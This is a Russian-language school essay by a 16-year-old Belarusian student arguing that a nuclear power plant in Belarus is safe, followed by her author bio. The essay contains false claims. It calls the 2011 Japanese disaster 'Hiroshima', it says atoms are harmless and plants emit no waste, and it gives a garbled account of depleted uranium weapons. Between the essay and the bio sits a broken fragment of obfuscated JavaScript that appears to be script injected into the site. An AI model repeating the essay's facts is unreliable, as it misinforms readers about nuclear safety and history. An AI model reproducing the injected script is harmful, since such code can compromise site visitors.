Стоит ли опасаться строительства АЭС в Беларуси?

 

«Будущее не за горами!»- эту фразу мы каждый день слышим по радио, телевизору и в кругу знакомых. Но ставили ли вы себе когда-нибудь вопрос: «Каким будет это будущее?». Научно-технический прогресс (НТП) не стоит на месте и как он влияет на человечество? Кем сегодня является человек без современных гаджетов? На данную тему невозможно рассуждать без примеров.. Предлагаю рассмотреть влияние НТП на примере атомной электростанции (АЭС).
Перед тем, как написать свое эссе, я провела социальный опрос в своей школе о том, как учащиеся относятся к строительству АЭС в нашей стране и в о том, как они видят будущее этого незаменимого источника энергии. Было опрошено 11 человек, из них 4 старшеклассника, 4 учащихся младшей школы и 3 учителя. Как видите, абсолютно разная возрастная аудитория. 90% участников социального опроса утверждают, что атомная электростанция- огромный экономический скачок нашей страны, а главное то, что он является безопасным. Полностью поддерживаю. Посудите сами, АЭС- экологический способ получения дешевой электроэнергии, которая сможет обеспечить энергией нашу страну на протяжении долгих лет. Это сбережет государственные затраты на ее закупку. При работе станции в окружающую среду не выбрасываются отходы, например, та же самая копоть, так как атом сам по себе не имеет ни цвета, ни запаха, поэтому является абсолютно безвредным. К тому же, АЭС- легкий, а главное безопасный способ добычи энергии. До электростанций приходилось добывать уголь, нефть, известно много случаев, когда работников шахт по добыче угля засыпало на рабочих местах. В отличии от шахт, АЭС создает безопасные условия для ее работников. Обедненный уран, который был использован для распространения топлива на атомной электростанции, применяется для создания грязных боеприпасов(вид ядерного оружия), такие боеприпасы впервые были созданы в Америке.
Те, кто считает, что атомная электростанция опасна- не знающие инженерии и системы безопасности люди. Все так боятся какого-то взрыва, при этом не могут ответить на простой вопрос, связанный с принципом работы АЭС. Вы думаете, что люди, занимающиеся строительством, а позже и работой на станции настолько глупы? Смех в зале. Наше человечество знает только 2 катастрофы, связанные с АЭС- Хиросима( Япония 12.03.2011) и Чернобыль (26.04.1986), а сколько станций при этом продолжают функционировать по всему миру? Правильно, огромное количество. Тем более, безопасность и экологичность работы станции обеспечиваются жестким выполнением правил эксплуатации и большим количеством контрольного оборудования: активная аварийная защита АЭС, система аварийного охлаждения активной зоны.
Поэтому, я смело могу сделать вывод о том, что атомная электростанция — окно в будущее нашей передовой страны и ее граждан!

Stroitelstvo-Belorusskaya-AE`S-foto                                              Cam_9_550c2RlbGFub3VuYXMucnUvaS9kLzMvZDNkM0xuTjBjbTk1YTJFdWNuVXZUV0YwWlhKcFlXeHpMMDVsZHlVeU1FWnZiR1JsY2k4eU5pOHdOakl6WDJodmRGOHhMbXB3Wno5ZlgybGtQVEU0TURJMS5qcGc_X19pZD0yODU3Mg==

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "websmi.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Savich Karina

Меня зовут Карина, ну, а если официально, то: Савич Карина Юрьевна. Мне 16 лет, учусь в 11 классе и собираюсь поступать...*барабанная дробь*... в институт журналистики! В плане характера- спокойная и общительная, легко могу подобрать ключик к любому человеку, в плане работы- ответственная, иногда даже слишком, если нужно что-то сделать- сделаю, даже если это отнимет у меня массу времени и сил- я все равно добьюсь желаемого результата. Обладаю организаторскими качествами. Уже с раннего возраста близкие начали замечать за мной повадки будущего журналиста: поздними вечерами, в своей комнате, я устраивала теле- и радиостудию, и в прямом эфире брала интервью у своих игрушек. Уже в младших классах я писала небольшие рассказы и сказки, которые учительница всегда ставила в пример. В старшей школе я стала лучшим другом нашего педагога-организатора. Я не помню ни одного школьного концерта, который бы прошел без меня. Я принимаю участие не только в школьных, но и районных, и даже городских конкурсах, в которых нужно показать себя, свой талант. Также играю в школьной лиге КВН, наша команда выходит на городской уровень, где занимает призовые места. Этим летом едем покорять мир!

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *